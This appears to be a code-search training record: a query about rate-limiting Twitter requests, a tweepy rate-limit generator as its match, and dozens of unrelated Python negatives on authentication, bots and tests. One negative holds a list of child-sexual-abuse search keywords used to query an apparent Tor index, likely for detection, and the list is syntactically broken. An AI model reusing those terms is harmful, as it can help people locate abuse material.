SHA256_MEMORY if MYSQL41 fails\n try:\n self._authenticate_sha256_memory()\n except InterfaceError as err:\n raise InterfaceError(\n \"Authentication failed using MYSQL41 and \"\n \"SHA256_MEMORY, check username and \"\n f\"password or try a secure connection err:{err}\"\n ) from err", "def test_forums_search_authorized_forums(self):\n # Create two threads: one in a restricted forum and one not.\n forum1 = ForumFactory(name=u'ou812forum')\n thread1 = ThreadFactory(forum=forum1)\n PostFactory(thread=thread1, content=u'audio')\n\n forum2 = RestrictedForumFactory(name=u'restrictedkeepout')\n thread2 = ThreadFactory(forum=forum2)\n PostFactory(thread=thread2, content=u'audio restricted')\n\n self.refresh()\n\n # Do a search as an anonymous user but don't specify the\n # forums to filter on. 
Should only see one of the posts.\n response = self.client.get(reverse('search.advanced'), {\n 'author': '',\n 'created': '0',\n 'created_date': '',\n 'updated': '0',\n 'updated_date': '',\n 'sortby': '0',\n 'a': '1',\n 'w': '4',\n 'q': 'audio',\n 'format': 'json'\n })\n\n eq_(200, response.status_code)\n content = json.loads(response.content)\n eq_(content['total'], 1)\n\n # Do a search as an authorized user but don't specify the\n # forums to filter on. Should see both posts.\n u = UserFactory()\n g = GroupFactory()\n g.user_set.add(u)\n ct = ContentType.objects.get_for_model(forum2)\n PermissionFactory(\n codename='forums_forum.view_in_forum',\n content_type=ct,\n object_id=forum2.id,\n group=g)\n\n self.client.login(username=u.username, password='testpass')\n response = self.client.get(reverse('search.advanced'), {\n 'author': '',\n 'created': '0',\n 'created_date': '',\n 'updated': '0',\n 'updated_date': '',\n 'sortby': '0',\n 'a': '1',\n 'w': '4',\n 'q': 'audio',\n 'format': 'json'\n })\n\n # Sees both results\n eq_(200, response.status_code)\n content = json.loads(response.content)\n eq_(content['total'], 2)", "def __init__(self):\n self._predefined_cluster_topics()\n self._gatherSEs()", "def m_apiInstance_AuthenticationStatusUpdate(self, sender, e):\r\n if e.Status.IsSuccess:\r\n # Add code here to begin working with the TT API\r\n # lookup an instrument\r\n self.m_req = ttapi.InstrumentLookupSubscription(self.m_apiInstance.Session, ttapi.Dispatcher.Current, ttapi.ProductKey(ttapi.MarketKey.Cme, ttapi.ProductType.Future, \"YM\"), \"Jun17\")\r\n self.m_req.Update += self.m_req_Update\r\n print(\"Connection Success!\")\r\n self.m_req.Start()\r\n else:\r\n print(\"TT Login failed: {0}\".format(e.Status.StatusMessage))\r\n self.Dispose()", "def __init__(self, topics=None):\n self.topics = topics or []", "def topic_index():\n topic = db.topic(request.args(0)) or redirect(URL('default', 'index'))\n return dict(topic=topic)", "def authenticate(self):\n token = self.get_config('token')\n if token:\n self.root.connection.login(\n None, None, token=token, auth_type='Bearer'\n )\n else:\n config.use_sessions = True\n self.root.load_session().get()", "def authentication(): \n pathToConfig = os.path.join(prefix, \"twitterConfig\")\n config = json.load(open(pathToConfig))\n consumer_key = config['consumer_key']\n consumer_secret = config['consumer_secret']\n access_token = config['access_token']\n access_token_secret = config['access_token_secret']\n api = twitter.Api(consumer_key=consumer_key, consumer_secret=consumer_secret,\n access_token_key=access_token, access_token_secret=access_token_secret)\n return api", "def __init__(self):\n self.topics = {}", "def index_corpus(is_authenticated, is_authorized):\n if not is_authorized:\n return render_template(\"unauthorized_user.html\"), 401\n\n try:\n thread1 = threading.Thread(target=index_keyword_updater.update)\n thread1.start()\n resp = Response(json.dumps({'status':'Ingest corpus started'}), status=201, mimetype='application/json')\n except Exception as e:\n logger.error(\"ingest_corpus api is failed with error %s\" % str(e))\n return render_template(\"internal_server_error.html\"), 500\n return resp", "def help_topics():\n pass", "def authenticate(credentials):", "def auth(self):\n\n self.name = self.config[\"sname\"]\n self.numeric = self.config[\"numeric\"]\n\n passwd = self.config[\"password\"]\n\n now = int(time.time())\n\n self.send_line(\"PASS :%s\" % passwd)\n self.send_line(\"SERVER %s 1 %d %d J10 %s]]] 0 :Gravelir Services\" %\\\n 
(self.name, now, now, self.numeric))", "def connect(self):\n\t\tself.accept()\n\t\tquery = urllib.parse.parse_qs(self.scope['query_string'].decode())\n\t\tdummy_func(f'question = {query[\"question\"][0]}, hashtag = {query[\"hashtag\"][0]}', self)", "def test_forums_search_authorized_forums_specifying_forums(self):\n # Create two threads: one in a restricted forum and one not.\n forum1 = ForumFactory(name=u'ou812forum')\n thread1 = ThreadFactory(forum=forum1)\n PostFactory(thread=thread1, content=u'audio')\n\n forum2 = RestrictedForumFactory(name=u'restrictedkeepout')\n thread2 = ThreadFactory(forum=forum2)\n PostFactory(thread=thread2, content=u'audio restricted')\n\n self.refresh()\n\n # Do a search as an anonymous user and specify both\n # forums. Should only see the post from the unrestricted\n # forum.\n response = self.client.get(reverse('search.advanced'), {\n 'author': '',\n 'created': '0',\n 'created_date': '',\n 'updated': '0',\n 'updated_date': '',\n 'sortby': '0',\n 'forum': [forum1.id, forum2.id],\n 'a': '1',\n 'w': '4',\n 'q': 'audio',\n 'format': 'json'\n })\n\n eq_(200, response.status_code)\n content = json.loads(response.content)\n eq_(content['total'], 1)\n\n # Do a search as an authorized user and specify both\n # forums. Should see both posts.\n u = UserFactory()\n g = GroupFactory()\n g.user_set.add(u)\n ct = ContentType.objects.get_for_model(forum2)\n PermissionFactory(\n codename='forums_forum.view_in_forum',\n content_type=ct,\n object_id=forum2.id,\n group=g)\n\n self.client.login(username=u.username, password='testpass')\n response = self.client.get(reverse('search.advanced'), {\n 'author': '',\n 'created': '0',\n 'created_date': '',\n 'updated': '0',\n 'updated_date': '',\n 'sortby': '0',\n 'forum': [forum1.id, forum2.id],\n 'a': '1',\n 'w': '4',\n 'q': 'audio',\n 'format': 'json'\n })\n\n # Sees both results\n eq_(200, response.status_code)\n content = json.loads(response.content)\n eq_(content['total'], 2)", "def authenticate(self):\n # self.qobject.remove_authenticate_signal.emit()\n # self.qobject.authenticate_signal.emit( )\n #if self.app.sync_thread.status != const.STATUS_SYNC:\n # self.app.sync_thread.force_sync()\n change_auth_token( )\n self.data_changed()", "def check_and_test_auth(self):\r\n time.sleep(10)\r\n webbrowser.open(AUTH_URL)\r\n\r\n while not self.is_authorized:\r\n time.sleep(5)\r\n self.get_tokens()\r\n\r\n # Finally start our polling & refresh threads.\r\n self.start_polling_and_refresh()", "def __init__(self):\n # keys and tokens from the Twitter Dev Console\n key = provide_keys('males')\n\n consumer_key = key['consumer_key']\n consumer_secret = key['consumer_secret']\n access_token = key['access_token_key']\n access_token_secret = key['access_token_secret']\n\n # attempt authentication\n\n # create OAuthHandler object\n self.auth = OAuthHandler(consumer_key, consumer_secret)\n\n # set access token and secret\n self.auth.set_access_token(access_token, access_token_secret)\n\n try:\n # create tweepy API object to fetch tweets\n self.api = tweepy.API(self.auth)\n\n except:\n print(\"Error: Authentication Failed\")\n sys.exit(-1)", "def authenticate():\n auth = OAuthHandler(config.TW_API_KEY, config.TW_API_SECRET)\n auth.set_access_token(config.TW_ACC_TOKEN, config.TW_ACC_SECRET)\n\n return auth", "def __init__(self, topic: str, credentials: Tuple[str, str]) -> None:\n self.topic = topic\n self.credentials = credentials", "def check_auth():", "def topics_from_user_input(self):\n\n getting_name = True\n\n print(\"\\nPlease enter username and 
press enter:\\n\")\n\n while getting_name:\n username = input()\n\n redditor = self(username)\n\n if not redditor.username:\n print(\"Redditor does not exist. Please enter again.\\n\")\n continue\n\n break\n\n redditor.print_topics()", "def learn_topic_model_activities(self):\n print \"\\nLearning a topic model with LDA:\"\n\n doc_topic, topic_word = tm.run_topic_model(self.accu_path, self.config['lda'])\n\n tm.dump_lda_output(self.lda_path, doc_topic, topic_word)\n print \"Topic Modelling - done.\\n\"\n return True", "async def initialize(self):\r\n self.access_token = await async_get_value(SPOTIFY_ACCESS_TOKEN)\r\n self.refresh_token = await async_get_value(SPOTIFY_REFRESH_TOKEN)\r\n self.should_poll = await async_get_value(SPOTIFY_SHOULD_POLL)\r\n request_code = self.get_currently_playing().status_code\r\n if request_code == requests.codes.ok or request_code == requests.codes.no_content:\r\n self.start_polling_and_refresh()\r\n return\r\n\r\n # Go through the oauth flow.\r\n self.auth_thread = StoppableThread(target=self.check_and_test_auth)\r\n self.auth_thread.start()\r\n return", "def authenticate(self):\n expires = int(time.time())\n method = \"GET\"\n path = \"/realtime\"\n msg = method + path + str(expires)\n signature = hmac.new(\n self.secret, msg.encode(), digestmod=hashlib.sha256\n ).hexdigest()\n\n req = {\"op\": \"authKey\", \"args\": [self.key, expires, signature]}\n self.send_packet(req)", "def __init__(self, topic):\n self.topic = topic", "def keep_alive(now):\n api.authenticate()\n _LOGGER.info(\"Authenticate against iCloud\")", "def main(keywords_file):\n try:\n # prepare credentials for accessing twitter API\n consumer_key = os.environ.get('CONSUMER_KEY')\n consumer_secret = os.environ.get('CONSUMER_SECRET')\n access_token = os.environ.get('ACCESS_TOKEN')\n access_token_secret = os.environ.get('ACCESS_TOKEN_SECRET')\n\n if (consumer_key is None or consumer_secret is None or\n access_token is None or access_token_secret is None):\n raise EnvironmentError('Missing twitter API credentials.')\n api = auth(consumer_key=consumer_key,\n consumer_secret=consumer_secret,\n access_token=access_token,\n access_token_secret=access_token_secret)\n\n db_name = os.environ.get('DB_NAME')\n if db_name is None:\n raise EnvironmentError('Database name is missing in evn file.')\n client = pymongo.MongoClient(host='localhost', port=27017,\n appname=__file__)\n db = client[db_name]\n filepath = os.path.basename(keywords_file)\n input_filename, _ = os.path.splitext(filepath)\n collection = db[input_filename]\n\n twitterStreamListener = TwitterStreamListener(collection=collection)\n twitterStream = tweepy.Stream(auth=api.auth,\n listener=twitterStreamListener)\n\n keywords = read_keywords_file(filename=keywords_file)\n logger.info('Streamer App has started listening for keywords: '\n f'{\", \".join(keywords)}')\n twitterStream.filter(track=keywords, is_async=True)\n except requests.exceptions.HTTPError as e:\n logger.error(\"Checking internet connection failed, \"\n f\"status code {e.response.status_code}\")\n except requests.exceptions.ConnectionError:\n logger.error(\"Could not establish a connection.\")\n except (ValueError, TypeError, TweepError, KeyError,\n EnvironmentError) as e:\n logger.error(e)\n except KeyboardInterrupt:\n logger.info('Program interrupted by user. 
')", "def authentication_hook(self):\n pass", "def authenticate(self):\n auth = tw.OAuthHandler(self.consumer_key, self.consumer_secret)\n auth.set_access_token(self.access_token, self.access_secret)\n return tw.API(auth)", "def auth(request):\n response_status_code = status.HTTP_403_FORBIDDEN\n\n try:\n ServiceToken.objects.get(service__identifier=request.POST.get('username'), service__is_active=True,\n key=request.POST.get('password'))\n\n response_status_code = status.HTTP_200_OK\n except ServiceToken.DoesNotExist:\n pass\n\n logger.info('MQTT authentication for service \"{}\" {}'.format(\n request.POST.get('username'), 'succeeded' if response_status_code == status.HTTP_200_OK else 'failed'))\n\n return HttpResponse(status=response_status_code)", "def test_topic_retrieval_unauthenticated(self):\n response = self.client.get('/topics/', format='json')\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)", "def start_flow(consumer_key, consumer_secret_key,\n access_token, access_secret_token,\n languages, track, locations, data_base):\n\n logger.info('Initializing listener')\n # Instantiate listener\n l = StdoutListener(data_base)\n\n logger.info('Authorization')\n auth = OAuthHandler(consumer_key, consumer_secret_key)\n auth.set_access_token(access_token, access_secret_token)\n\n # Start data stream\n logger.info('Beginning streaming')\n stream = Stream(auth, l)\n stream.filter(track=track,\n languages=languages,\n locations=locations)", "def authenticate(self):\n self.connection.authenticate()", "def topic(cls, **kwargs) -> str:\n return \"hermes/asr/startListening\"", "def auth(self):\n ok = False\n if self.private_token:\n ok = self.token_auth()\n if not ok:\n self.credentials_auth()", "def _authenticate(self):\n if self.creds().consumer_key() is None or \\\n self.creds().app_secret() is None:\n self.logger.error(\"You need a consumer key and app secret, yo\")\n else:\n self._access_token = self._request_access_token()", "def __init__(self, addr, port, auth_info=None, base_topic=\"\"):\n self._addr = addr\n self._port = port\n self._connected = False\n self._client = mqtt.Client(client_id=\"\", clean_session=True, userdata=None, protocol=mqtt.MQTTv311)\n self._client.on_message = self.on_messagge\n self._callbacks = {}\n if auth_info is not None:\n self._client.username_pw_set(auth_info[\"user\"], auth_info[\"password\"])\n self._base_topic = base_topic", "def __init__(self, session = None) -> None:\n self.session = session or ClientSession()\n self._topics = { # {key: placeholder}\n 'capital': 'Capital City',\n 'region': 'Region',\n 'subregion': 'Sub-region',\n 'population': 'Sub-region',\n 'demonym': 'Demonym',\n 'nativeName': 'Native name'\n }", "def login():\n print (\"Welcome to ExpressTruthNow! To access twitter, please enter \" + \n \"the path of the information login file. 
(use '/' in path!)\")\n\n path = (folderlink + \"/info.txt\")\n key = returninfo(path, \"API\") # API Key\n secret = returninfo(path, \"SECRET\") # API authentication\n access = returninfo(path, \"ACCESS\") # Request Key\n secaccess = returninfo(path, \"SECACCESS\") # Request authentication\n\n auth = tweepy.OAuthHandler(key, secret) \n auth.set_access_token(access, secaccess)\n\n print \"Login Successful.\"\n \n return(tweepy.API(auth))", "def apply_auth():\n\tclient = BaiduOpenApi()\n\tapi = client.device.code\n\tresp = client.device.code.get(response_type=\"device_code\", scope=\"netdisk\")\n\t# open grant page and wait for user confirm\n\twebbrowser.open_new_tab(r\"http://openapi.baidu.com/device?code=%s\"%resp[\"user_code\"])\n\t# yield to main\n\tyield\n\t# main will tell user to confirm and it will take a while\n\t# polling to wait server back\n\tpolling_tokens(resp[\"device_code\"], resp[\"interval\"], resp[\"expires_in\"])", "def t_auth():\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, token_secret)\n return tweepy.API(auth)", "def main() -> None:\n\n logger.info(f\"Arguments: {args}\")\n client = iotcore.Client()\n client.subscribe(args.request_topic, iotcore.QOS.AT_MOST_ONCE, handler)\n\n while True:\n # Keep app open and running\n time.sleep(1)", "def authenticate():\n print('Authenticating...\\n')\n authentication = praw.Reddit(site_name=config['BOT_NAME'], user_agent=config['USER_AGENT'])\n print(f'Authenticated as {authentication.user.me()}\\n')\n return authentication", "def is_session_in_topic(cls) -> bool:\n return True", "def authorization():\n pass", "def listen(self, topics):\n logging.debug(f'Listen to {list(map(lambda x: x.name, topics))}')\n\n for topic in map(lambda x: x.name, topics):\n try:\n self.subscribe(topic)\n logging.debug(f'Subscribed the {topic} topic')\n except Exception:\n logging.debug(f\"Can't subscribe the {topic} topic\")", "def start(update: Update, context: CallbackContext):\n # Prompt for topic\n update.message.reply_text(f'Choose a topic!', reply_markup = ReplyKeyboardMarkup(keyboard = [[topic] for topic in context.bot_data['quiz']], resize_keyboard = True, one_time_keyboard = True))\n\n return CHOOSE_A_TOPIC", "def run(config, logging, inq, subscribe_callback, unsubscribe_callback):", "def authenticate(self, username, password, consumerKey, consumerSecret):\r\n self.send_authenticate(username, password, consumerKey, consumerSecret)\r\n return self.recv_authenticate()", "def requestTopics(self):\n self.port.flushInput()\n # request topic sync\n self.port.write(\"\\xff\\xff\\x00\\x00\\x00\\x00\\xff\")", "def consume(userid:str, token:str, registry=None):", "def auth(self):\n return self.api(self.token)", "def start_mqtt_auth_watcher(run_event):\n print('START MQTT WATCHER')\n cmd = ['/app/src/mosquitto_watcher.sh']\n # , cwd=os.path.join(os.path.dirname(__file__))\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)\n while run_event.is_set():\n time.sleep(1)\n process.terminate()\n process.wait()", "def configurations(corpus, search, **kwargs):\n\n from corpkit.dictionaries.wordlists import wordlists\n from corpkit.dictionaries.roles import roles\n from corpkit.interrogation import Interrodict\n from corpkit.interrogator import interrogator\n from collections import OrderedDict\n\n if search.get('l') and search.get('w'):\n raise ValueError('Search only for a word or a lemma, not both.')\n\n # are we searching words or lemmata?\n if search.get('l'):\n dep_word_or_lemma = 'dl'\n 
gov_word_or_lemma = 'gl'\n word_or_token = search.get('l')\n else:\n if search.get('w'):\n dep_word_or_lemma = 'd'\n gov_word_or_lemma = 'g'\n word_or_token = search.get('w')\n\n # make nested query dicts for each semantic role\n queries = {'participant': \n\n {'left_participant_in': \n {dep_word_or_lemma: word_or_token,\n 'df': roles.participant1,\n 'f': roles.event},\n\n 'right_participant_in':\n {dep_word_or_lemma: word_or_token,\n 'df': roles.participant2,\n 'f': roles.event},\n\n 'premodified':\n {'f': roles.premodifier, \n gov_word_or_lemma: word_or_token},\n\n 'postmodified':\n {'f': roles.postmodifier, \n gov_word_or_lemma: word_or_token},\n\n 'and_or':\n {'f': 'conj:(?:and|or)',\n 'gf': roles.participant,\n gov_word_or_lemma: word_or_token},\n },\n\n 'process':\n\n {'has_subject':\n {'f': roles.participant1,\n gov_word_or_lemma: word_or_token},\n\n 'has_object':\n {'f': roles.participant2,\n gov_word_or_lemma: word_or_token},\n\n 'modalised_by':\n {'f': r'aux',\n 'w': wordlists.modals,\n gov_word_or_lemma: word_or_token},\n\n 'modulated_by':\n {'f': 'advmod',\n 'gf': roles.event,\n gov_word_or_lemma: word_or_token},\n\n 'and_or':\n {'f': 'conj:(?:and|or)',\n 'gf': roles.event, \n gov_word_or_lemma: word_or_token},\n \n },\n\n 'modifier':\n\n {'modifies':\n {'df': roles.modifier,\n dep_word_or_lemma: word_or_token},\n\n 'modulated_by':\n {'f': 'advmod',\n 'gf': roles.modifier,\n gov_word_or_lemma: word_or_token},\n\n 'and_or':\n {'f': 'conj:(?:and|or)',\n 'gf': roles.modifier,\n gov_word_or_lemma: word_or_token},\n\n }\n }\n\n # allow passing in of single function\n if search.get('f'):\n if search.get('f').lower().startswith('part'):\n queries = queries['participant']\n elif search.get('f').lower().startswith('proc'):\n queries = queries['process']\n elif search.get('f').lower().startswith('mod'):\n queries = queries['modifier']\n else:\n newqueries = {}\n for k, v in queries.items():\n for name, pattern in v.items():\n newqueries[name] = pattern\n queries = newqueries\n queries['and_or'] = {'f': 'conj:(?:and|or)', gov_word_or_lemma: word_or_token}\n\n # count all queries to be done\n # total_queries = 0\n # for k, v in queries.items():\n # total_queries += len(v)\n \n kwargs['search'] = queries\n \n # do interrogation\n data = corpus.interrogate(**kwargs)\n \n # remove result itself\n # not ideal, but it's much more impressive this way.\n if isinstance(data, Interrodict):\n for k, v in data.items():\n v.results = v.results.drop(word_or_token, axis=1, errors='ignore')\n v.totals = v.results.sum(axis=1)\n data[k] = v\n return Interrodict(data)\n else:\n return data", "def authd(self, xmlstream):\n\t\tprint \"authenticated\"\n\t\t\n\t\tpresence = domish.Element(('jabber:client', 'presence'))\n\t\tpresence.addElement('status').addContent('Online')\n\t\txmlstream.send(presence)\n\n\t\t#xmlstream.addObserver('/message', self.debug)\n\t\t#xmlstream.addObserver('/presence', self.debug)\n\t\t#xmlstream.addObserver('twisted.words.xish.xmlstream.STREAM_ERROR_EVENT', self.debug)\n\t\tself.xmlstream = xmlstream\n\t\tself.joinRoom(xmlstream)", "def on_start(self):\n self.login()", "def on_start(self):\n self.login()", "def on_start(self):\n self.login()", "def on_start(self):\n self.login()", "def authenticate():\n auth = OAuthHandler(config.CONSUMER_API_KEY, config.CONSUMER_API_SECRET)\n auth.set_access_token(config.ACCESS_TOKEN, config.ACCESS_TOKEN_SECRET)\n\n return auth", "def authenticate():\n auth = OAuthHandler(config.CONSUMER_API_KEY, config.CONSUMER_API_SECRET)\n 
auth.set_access_token(config.ACCESS_TOKEN, config.ACCESS_TOKEN_SECRET)\n\n return auth", "def run(self):\n rate = rospy.Rate(30)\n #rospy.loginfo(\"[perspective_filter] Start running the ros node\")\n while not rospy.is_shutdown():\n try:\n self.compute_relations()\n if self.visibility_monitor:\n self.filter()\n #self.publish_perspectives()\n rate.sleep()\n except KeyboardInterrupt:\n break", "def filter(self, *, threaded=False, **params):\n if self.running:\n raise TweepyException(\"Stream is already connected\")\n\n method = \"GET\"\n endpoint = \"search\"\n\n params = self._process_params(\n params, endpoint_parameters=(\n \"backfill_minutes\", \"expansions\", \"media.fields\",\n \"place.fields\", \"poll.fields\", \"tweet.fields\", \"user.fields\"\n )\n )\n\n if threaded:\n return self._threaded_connect(method, endpoint, params=params)\n else:\n self._connect(method, endpoint, params=params)", "def test_topic_list_view_unauthenticated(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context[\"topics\"]), 3)", "def listSearches(self, authenticationToken):\r\n pass", "def __init__(self, twitter_consumer_key, twitter_consumer_secret,\n twitter_access_key, twitter_access_secret,\n search_terms, search_on='news',\n bitly_access_token='',\n news_api_key=''):\n\n # Access Keys and Secrets for Twitter API obtained at: https://developer.twitter.com/\n auth = tweepy.OAuthHandler(twitter_consumer_key, twitter_consumer_secret)\n auth.set_access_token(twitter_access_key, twitter_access_secret)\n\n # Store API object for access to Twitter REST API\n self.__api = tweepy.API(auth)\n\n # Term(s) to search news feeds or Twitter on\n self.search_terms = search_terms\n\n # Method TwitterBot will use to search on. 
Current options are 'news' or 'twitter'\n self.search_on = search_on\n\n # Access token for optional Bitly API: https://dev.bitly.com/\n self.__bitly_access_token = bitly_access_token\n\n # Access token for optional News API: https://newsapi.org/\n self.__news_api_key = news_api_key\n\n # Will store list of items scraped from news or Twitter\n self.list = []", "def initialize(self):\n self.login()", "def main():\n client = SlackClient(ACCESS_TOKEN)\n\n if not client.rtm_connect(with_team_state=False):\n print(\"could not connect to slack\")\n sys.exit(1)\n\n print(\"connected to network!\")\n\n bot_id = client.api_call(\"auth.test\")[\"user_id\"]\n\n for data in tagged_messages(client, bot_id):\n if any(x in data.get(\"text\") for x in [\"lunch\", \"eat\", \"hungry\"]):\n whats_for_lunch(client, data)\n continue", "def test_authenticated(self):\n self.browser.addHeader(\n \"Authorization\", \"Basic {}:{}\".format(\"reviewer\", TEST_USER_PASSWORD)\n )\n self.browser.open(\"http://nohost/plone/full_review_list\")\n self.assertTrue(\"Full review list:\" in self.browser.contents)", "def main():\n domain_list = []\n base_url = \"http://localhost:9200/latest-tor/_search?pretty&size=9000&_source=title,domain\"\n keywords_list = ['preteen', 'loli', 'lolita', 'jailbait', 'pthc', 'best cp',\n '\"child porn\"', '\"kid porn\"', '\"child sex\"', '\"cp video\"',\n '\"nude children\"', '\"cp porn\"', '\"free child porn\"', 'kinderporn',\n '\"child rape\"', '\"toddler porn\"', '\"kids videos\"', '\"cp videos\"',\n 'lolilust', '\"pedo porno\"', '\"pedo content\"', 'underage', '\"cp pack\"',\n 'loliporn', 'pedofamily', '\"cp database\"', '\"pedo webcams\"', 'lolitacity']\n '\"xxx child\"', '\"xxx underage\"', '\"young forbidden\"']\n search_terms = []\n for index, term in enumerate(keywords_list):\n search_terms.append(term)\n if len(search_terms) >= 10 or index + 1 == len(keywords_list):\n url = base_url + \"&q=(\" + \" OR \".join(search_terms).replace(\" \", \"%20\") + \")\"\n search(url, domain_list)\n search_terms = []", "async def connect(self):\n\t\tprint(\"DocumentChatConsumer: connect: \" + str(self.scope[\"user\"]))\n\t\t# let everyone connect. 
But limit read/write to authenticated users\n\t\tawait self.accept()\n\t\tself.document_id = None", "def enable_subscription():\n client = KConsumer(config=subscriber_config)\n counter = 0\n while 1:\n data = client.consume()\n if data:\n print(\"Received Data\", counter)\n class_label = inference_on_data(data.value)\n publish_response(class_label)", "def init(\n self,\n ) -> bool:\n success = True\n try:\n self._allowed_users = self._get_allowed_users(\n **self._config[\"allowed_users\"]\n )\n self._api_key = keyring.get_password(\n self._config[\"namespace\"], self._config[\"api\"]\n )\n # Create the Application and pass it your bot's token.\n self.application = Application.builder().token(self._api_key).build()\n # on different commands - answer in Telegram\n self.application.add_handler(\n CommandHandler(\n command=\"status\",\n callback=self._check_status,\n filters=filters.Chat(self._allowed_users),\n )\n )\n self.application.add_handler(\n CommandHandler(\n command=\"pump\",\n callback=self._toggle_pump,\n filters=filters.Chat(self._allowed_users),\n )\n )\n self.application.add_handler(\n CommandHandler(\n command=\"valve1\",\n callback=partial(self._toggle_valve, valve_number=1),\n filters=filters.Chat(self._allowed_users),\n )\n )\n self.application.add_handler(\n CommandHandler(\n command=\"valve2\",\n callback=partial(self._toggle_valve, valve_number=2),\n filters=filters.Chat(self._allowed_users),\n )\n )\n self.application.add_handler(\n CommandHandler(\n command=\"valve3\",\n callback=partial(self._toggle_valve, valve_number=3),\n filters=filters.Chat(self._allowed_users),\n )\n )\n self.application.add_handler(\n CommandHandler(\n command=\"holidays\",\n callback=self._toggle_holidays,\n filters=filters.Chat(self._allowed_users),\n )\n )\n # on non command i.e message - echo the message on Telegram\n self.application.add_handler(\n MessageHandler(filters.TEXT & ~filters.COMMAND, None)\n )\n # Step log runninng al 200ms\n context = CallbackContext(self.application)\n context.job_queue.run_repeating(callback=self.step_log, interval=0.2)\n # logging info\n print(f\"'{self._name}' - {self._pid} successfully initialized\")\n self.telegram_queue.put(\n f\"Process {self._pid} - '{self._name}' successfully initialized\"\n )\n # Run the bot until the user presses Ctrl-C\n self.application.run_polling(allowed_updates=Update.ALL_TYPES)\n except Exception as error:\n print(f\"Process {self._pid} - \" + repr(error))\n success = False\n return success", "def login(self) -> None:\n\n sObj = Splitwise(self.consumer_key, self.consumer_secret)\n self.url, self.login_secret = sObj.getAuthorizeURL()\n print(self.url)\n self.oauth_token = input('token: ')\n self.oauth_verifier = input('verifier: ')", "def __init__(self):\n self.auth()", "def authenticate(self, reader, username, password):\n self.authentication[reader] = (username, password)\n return {\n 'status': 0,\n 'return': True\n }", "def __init__(self):\n super().__init__()\n\n # Will only reply to every 3rd or so tweet, defined in settings\n self.received_tweet_count = 0\n\n # Twitter api init\n self.auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n self.auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)\n self.twitter_api = tweepy.API(self.auth)\n\n print('Authenticated, creating stream...')\n\n self._init_stream()", "def main():\n\n run_manual_session()\n # run_automated_session()", "def authenticated(self):\n self.__logger.debug(\"Setting up Disco handlers...\")\n 
self.stream.set_iq_get_handler(\"query\",\"http://jabber.org/protocol/disco#items\",\n self.__disco_items)\n self.stream.set_iq_get_handler(\"query\",\"http://jabber.org/protocol/disco#info\",\n self.__disco_info)", "def runSearch():\n\tglobal processLanguageOn\n\tdataToFind=getDataFromWidget(podSearchEntry)\n\t#Search through the keys otherwise data changes\n\tdataSource=podListbox.data.keys()\n\t#Store the results of the search\n\tresults=[]\n\t#Search the data source\n\tfor item in dataSource:\n\t\tif searchDataSource(dataToFind,[item],capital=True,full=False):\n\t\t\tresults.append(item)\n\n\t#Add the results to screen\n\tpodListbox.delete(0,END)\n\tfor item in results:\n\t\tpodListbox.addExisting(item)\n\n\tif processLanguageOn:\n\t\tprocessSearchLanguage(podSearchEntry)", "def authenticate(self):\n self.login(closet.app.config['USERNAME'],\n closet.app.config['PASSWORD'])", "def _ATTopic_query(self, **kw):\n del kw['path'] # don't want to limit to context as w/ folders\n return self.context.queryCatalog(self.context.REQUEST, \n False, # no batch here\n None, # no b_size here\n False,\n **kw)", "def start(self):\n if not self.available:\n self.get_auth_token()\n\n if self.key_required and not self.no_prompt:\n email = self.login_handler.data[\"username\"]\n key = input(\"Enter code sent to {}: \".format(email))\n result = self.login_handler.send_auth_key(self, key)\n self.key_required = not result\n self.setup_post_verify()\n elif not self.key_required:\n self.setup_post_verify()", "def update(self, config):\n self.n_topics = config['n_topics'] \n self.n_passes = config['n_passes'] \n self.min_docfreq = config['min_docfreq'] \n self.max_docfreq = config['max_docfreq']\n self.ngrams = config['ngrams'] \n self.n_words = config['n_words'] \n self.topic_range = config['topic_range'] \n self.ext_stop_words = config['ext_stop_words']", "def login_bot(self):\n pass", "def login(self):\n #create a client class which will make http requests with google docs server.\n print 'Logging in as '+ self.user + '\\n'\n self.client = gdata.sites.client.SitesClient(source=self.source, site=self.site, domain=self.domain)\n self.client.ClientLogin(self.user, self.PASS, self.client.source)" ]
[ "0.6053095", "0.58813876", "0.5666131", "0.557826", "0.5459492", "0.53823984", "0.532111", "0.532111", "0.5253463", "0.5241494", "0.52394074", "0.5199479", "0.51915526", "0.5182518", "0.51710373", "0.5163896", "0.51167077", "0.5087796", "0.50840545", "0.5075657", "0.5069533", "0.5069279", "0.5048159", "0.504411", "0.50242054", "0.50174624", "0.50005287", "0.49922007", "0.49904615", "0.4990199", "0.49845254", "0.49801382", "0.49572533", "0.49530932", "0.4948023", "0.49271432", "0.49156907", "0.4912503", "0.4906094", "0.49044928", "0.49020666", "0.49001107", "0.48913008", "0.48850393", "0.48771977", "0.4865874", "0.48588222", "0.48519737", "0.48401418", "0.4836969", "0.48235768", "0.47965917", "0.47876218", "0.47838765", "0.47667524", "0.47658372", "0.47655767", "0.47591826", "0.47514576", "0.47491068", "0.47399595", "0.47374427", "0.47358355", "0.47345144", "0.47318813", "0.47284898", "0.47247916", "0.47236875", "0.47217277", "0.47196952", "0.4710057", "0.4710057", "0.4710057", "0.4710057", "0.47082332", "0.47082332", "0.4698401", "0.4694452", "0.46931282", "0.46898937", "0.46880698", "0.46876222", "0.46815878", "0.4680778", "0.46801785", "0.4665836", "0.46598333", "0.46569294", "0.46551347", "0.46508247", "0.46442166", "0.464196", "0.46410963", "0.4622255", "0.46194586", "0.46177563", "0.461728", "0.46143827", "0.46000415", "0.4598374", "0.4597229" ]
0.0
-1
Limit the requests sent to the Twitter server
def limit_handled(cursor):\n    # TODO: possibly need this function to limit request frequency\n    while True:\n        try:\n            yield cursor.next()\n        except tweepy.RateLimitError:\n            time.sleep(60)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
